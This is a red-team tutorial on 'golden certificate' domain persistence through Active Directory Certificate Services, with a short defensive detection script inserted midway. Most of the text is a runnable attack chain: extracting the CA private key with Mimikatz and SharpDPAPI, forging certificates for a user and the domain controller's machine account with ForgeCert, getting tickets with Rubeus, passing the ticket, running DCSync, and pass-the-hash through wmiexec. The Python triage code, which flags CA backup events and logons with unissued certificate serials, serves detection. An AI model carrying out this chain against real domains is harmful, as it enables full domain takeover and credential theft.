Domain persistence techniques allow red teams that have compromised the domain to operate with the highest level of privileges for a long period. One of the most common domain persistence techniques is the Golden Ticket attack, which involves the creation of a Kerberos ticket using the NTLM hash of the “krbtgt” account. However, in domains that have deployed servers which act as Active Directory Certificate Services (AD CS), it is possible for these to be abused for domain persistence in the event of a compromise. This is possible by stealing the private key of the CA certificate, which would allow a red team to forge and sign a certificate to be used for authentication. Certificate-based authentication is enabled by default in a domain during deployment of Active Directory Certificate Services (AD CS). Therefore these systems should be considered tier-0 assets and protected accordingly.
Initially this technique was implemented by Benjamin Delpy in Mimikatz. Later, Will Schroeder and Lee Christensen discussed the topic in the Certified Pre-Owned paper and introduced a tool which could be used during red team operations in order to forge certificates with the CA certificate. Operating under the radar is important in red team assessments, and domain persistence via a golden certificate provides this benefit compared to other techniques such as DCShadow and Golden Ticket, which have existed for more years. Performing domain persistence via a Golden Certificate requires the following steps:
- Certificate Extraction (CA)
- Forge CA Certificate
- Obtain a Kerberos Ticket (Machine account of DC)
- Perform Pass the Ticket
The CA certificate and the private key are stored on the CA server. Using an RDP connection to the system, these can be retrieved using the Back up functionality of “certsrv.msc”.
During the certification authority backup wizard, the private key and the CA certificate can both be exported into a specified location.
The CA certificate will be exported as a p12 file (Personal Information Exchange).
However, there are a few other methods which can be used to extract the CA certificate and the private key from the server. Executing Seatbelt with the parameter “Certificates” can enumerate the stored CA certificates.
Mimikatz can also interact with the crypto stores in order to retrieve and export certificates and private keys. After patching CryptoAPI and the KeyIso service, keys marked as non-exportable become exportable from the various key providers.
privilege::debug
crypto::capi
crypto::cng
crypto::certificates /systemstore:local_machine /store:my /export
The certificates will be extracted in both .DER and .PFX format on the disk.
SharpDPAPI can also be used for extraction of certificates. Executing the “certificates /machine” command will use the machine certificate store to extract decryptable machine certificates and private keys.
SharpDPAPI.exe certificates /machine
Both the private key and the certificate will be displayed in the console.
The extracted private key and the certificate can be written into a file with the .PEM extension. Executing the following command converts the certificate into a usable format such as .PFX, allowing it to be used for authentication with Rubeus.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Forge CA Certificate
Mimikatz can be used to forge and sign a certificate by using the “crypto::scauth” module. Originally this module was developed for creating smart card authentication user certificates. The arguments required are the subject name of the certificate authority and the user principal name of the user for which the certificate will be created. Optionally the “/pfx” argument can be used to define the filename of the certificate which is going to be created.
crypto::scauth /caname:ca /upn:[email protected]
Alternatively, ForgeCert was developed by Lee Christensen in C# and allows red teams to forge a certificate for any domain user using the CA certificate for authentication. The tool can be executed from the memory of the implant and will write a file to disk. Executing the following command will create a fake certificate for the “pentestlab” user which will be signed by the private key of the CA certificate.
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName [email protected] --NewCertPath localadmin.pfx --NewCertPassword Password123
It should be noted that the certificate must be created for an active user on the domain. Therefore it cannot be used for the “krbtgt” account. The forged certificate will have a validity period of one year and will be valid as long as the CA certificate is valid (typically 5 years). Apart from domain user accounts, machine accounts can be used as well for domain persistence, since techniques such as DCSync, Pass the Ticket and S4U2Self can then be used.
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName [email protected] --NewCertPath DC$.pfx --NewCertPassword Password123
Kerberos Ticket
A Kerberos ticket can be requested from the Key Distribution Center (KDC) using the forged certificate for authentication.
Rubeus.exe asktgt /user:pentestlab /certificate:localadmin.pfx /password:Password123
Pass the Ticket
The certificate which belongs to the machine account of the domain controller can be used from any host on the domain in order to request a Kerberos ticket. Executing the following command will retrieve a ticket in base64 format.
Rubeus.exe asktgt /user:DC$ /certificate:DC$.pfx /password:Password123
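The two stages above leave traces a defender can check for. A CA backup through certsrv.msc is logged on the CA host as Security events 4876 (Certificate Services backup started) and 4877 (Certificate Services backup completed). A TGT obtained with a certificate via PKINIT is logged on the domain controller as event 4768 carrying the certificate issuer name, serial number and thumbprint; since a forged certificate never passed through the CA, its serial number does not appear in the CA's issued-certificate database (for example as listed by certutil -view). The following script is an added example, not part of the original post and not from any of the tools it mentions; the events and the issued-serial list are constructed, and the field names are simplified versions of the Windows event fields.

```python
"""Triage helpers for golden-certificate persistence (added example, constructed data)."""
import re

# Constructed sample events (not real logs). Keys are simplified Windows Security
# event fields. Event 4768 carries certificate fields only when PKINIT was used.
SAMPLE_EVENTS = [
    {"EventID": 4876, "Computer": "CA01.pentestlab.local", "SubjectUserName": "jdoe",
     "Message": "Certificate Services backup started. Backup Type: Full"},
    {"EventID": 4877, "Computer": "CA01.pentestlab.local", "SubjectUserName": "jdoe",
     "Message": "Certificate Services backup completed."},
    # Legitimate certificate logon: serial is present in the CA database below.
    {"EventID": 4768, "Computer": "DC01.pentestlab.local", "TargetUserName": "alice",
     "IpAddress": "10.0.0.25", "CertIssuerName": "pentestlab-CA",
     "CertSerialNumber": "610000000200000001"},
    # Suspicious: the DC machine account authenticates from a workstation with a
    # certificate whose serial the CA never issued (forged offline with the CA key).
    {"EventID": 4768, "Computer": "DC01.pentestlab.local", "TargetUserName": "DC$",
     "IpAddress": "10.0.0.77", "CertIssuerName": "pentestlab-CA",
     "CertSerialNumber": "0badc0ffee0000000001"},
    # Password-based pre-authentication: no certificate fields, nothing to compare.
    {"EventID": 4768, "Computer": "DC01.pentestlab.local", "TargetUserName": "bob",
     "IpAddress": "10.0.0.31"},
]

# Constructed list of serial numbers the CA actually issued, in the spaced
# hex form certutil prints. In practice this comes from the CA database export.
ISSUED_SERIALS = [
    "61 00 00 00 02 00 00 00 01",
    "61 00 00 00 03 00 00 00 02",
]


def normalize_serial(serial: str) -> str:
    """Strip spaces/colons and lowercase so certutil and 4768 forms compare equal."""
    return re.sub(r"[^0-9a-f]", "", serial.lower())


def find_ca_backup_events(events):
    """Return CA backup start/complete events; each one should map to a change record."""
    return [e for e in events if e.get("EventID") in (4876, 4877)]


def find_unissued_certificate_logons(events, issued_serials):
    """Return certificate-based TGT requests whose serial is absent from the CA database."""
    issued = {normalize_serial(s) for s in issued_serials}
    findings = []
    for e in events:
        if e.get("EventID") != 4768:
            continue
        serial = e.get("CertSerialNumber")
        if not serial:
            continue  # password pre-auth, no certificate involved
        if normalize_serial(serial) not in issued:
            findings.append({
                "account": e.get("TargetUserName"),
                "source": e.get("IpAddress"),
                "issuer": e.get("CertIssuerName"),
                "serial": normalize_serial(serial),
            })
    return findings


def triage(events, issued_serials):
    """Run both checks and return the findings grouped by check."""
    return {
        "ca_backups": find_ca_backup_events(events),
        "unissued_cert_logons": find_unissued_certificate_logons(events, issued_serials),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS, ISSUED_SERIALS)
    for e in result["ca_backups"]:
        print(f"[CA backup] {e['Computer']} event {e['EventID']} by {e['SubjectUserName']}")
    for f in result["unissued_cert_logons"]:
        print(f"[unissued cert] {f['account']} from {f['source']} serial {f['serial']}")
```

The serial comparison is the stronger signal: a backup can be legitimate and is easily tied to a change ticket, whereas a certificate that authenticates successfully but was never issued by the CA has no benign explanation and points directly at a compromised CA key, which means the CA certificate needs to be renewed with a new key.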
The base64 ticket can be decoded and written into a file with the .kirbi extension.
echo "<base64>" | base64 -d > dc$.kirbi
The ticket can be transferred to any domain-joined Windows host and imported into any user session using the pass the ticket method.
Rubeus.exe ptt /ticket:dc$.kirbi
Since the ticket belongs to the machine account of the domain controller, further actions such as DCSync can be performed. From the current session, executing Mimikatz and running the command below will retrieve the NTLM hash of the user Administrator, which is a domain administrator account.
The hash can be used to obtain access to the domain controller using the pass the hash method or via a WMI connection.
python3 wmiexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 [email protected]